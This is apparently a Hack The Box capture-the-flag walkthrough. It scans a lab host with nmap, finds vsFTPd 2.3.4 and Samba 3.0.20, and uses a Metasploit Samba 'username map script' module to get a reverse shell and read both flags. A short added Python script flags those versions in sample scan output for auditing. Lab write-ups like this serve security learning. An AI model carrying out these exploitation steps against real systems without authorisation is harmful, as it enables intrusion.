Step 1: preparation
- Connect to the VIP HTB VPN
- Add $IP variable to shell for faster operation
    IP=10.10.X.X
    echo $IP
Step 2: enumeration
I start with a basic nmap scan:
    nmap $IP
This scan returns "Host seems down. If it is really up, but blocking our ping probes, try -Pn".
So I try again with the suggested flag:
    nmap -Pn $IP
It returns that 4 ports are available.
Given that, I run a more precise (and longer) scan:
    nmap -Pn -sV -sC $IP
I can see that vsFTPd is on version 2.3.4 and Samba is on version 3.0.20.
It should be enough for exploitation.
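An added example, not part of the original write-up: a small Python check that reads `nmap -Pn -sV -sC` output and flags the two versions identified above, for use when auditing your own hosts. The scan text is a constructed sample, and `WATCHLIST` and `flag_watchlisted` are names chosen for this example; in the sample the exact Samba version only appears in the script output, which is why the `-sC` run matters.

```python
import re

# Versions the write-up singles out; extend with your own do-not-expose list.
WATCHLIST = {"vsftpd": {"2.3.4"}, "samba": {"3.0.20"}}

# Constructed sample of `nmap -Pn -sV -sC` output (not captured from a real host).
SAMPLE_SCAN = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+\S+\s*(.*)$")
# Product name followed by a fully numeric version; "3.X - 4.X" will not match.
PRODUCT_VERSION = re.compile(r"\b(vsftpd|samba)\b(?:\s+smbd)?\s+v?(\d+(?:\.\d+)+)", re.I)


def flag_watchlisted(scan_text):
    """Return sorted (location, product, version) tuples for watch-listed versions."""
    findings = set()
    location = None
    for line in scan_text.splitlines():
        port = PORT_LINE.match(line)
        if port:
            location = f"{port.group(1)}/{port.group(2)}"
            banner = port.group(3)
        elif line.startswith("Host script results"):
            location = "host-script"
            continue
        elif line.startswith("|") and location:
            banner = line  # NSE script output belongs to the last port or host section
        else:
            continue
        for product, version in PRODUCT_VERSION.findall(banner):
            product = product.lower()
            if version in WATCHLIST.get(product, ()):
                findings.add((location, product, version))
    return sorted(findings)


if __name__ == "__main__":
    for location, product, version in flag_watchlisted(SAMPLE_SCAN):
        print(f"{location}: {product} {version} is on the watch list")
```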
Step 3: exploitation
Samba 3.0.20
A quick search in msfconsole gives me a result named Samba "username map script" Command Execution.
So I use this module and check which options are available:
    msf > use 0
    msf > show options
RHOSTS is empty and required, so I set it:
    msf > set RHOSTS $IP
(replace $IP with the real target IP)
NOTE: LHOST needs to be set to the HTB VPN TUN interface, not your local IP.
And then I launch the exploit:
    msf > exploit
I am now in a reverse shell!
    cd home
    ls
    - ftp
    - makis
    - service
    - ...
    cd makis
    ls
    - user.txt
    cat user.txt
The user flag is done.
For root, I go back to the top-level directory, navigate to the root folder and get the root.txt file.
Step 4: that's it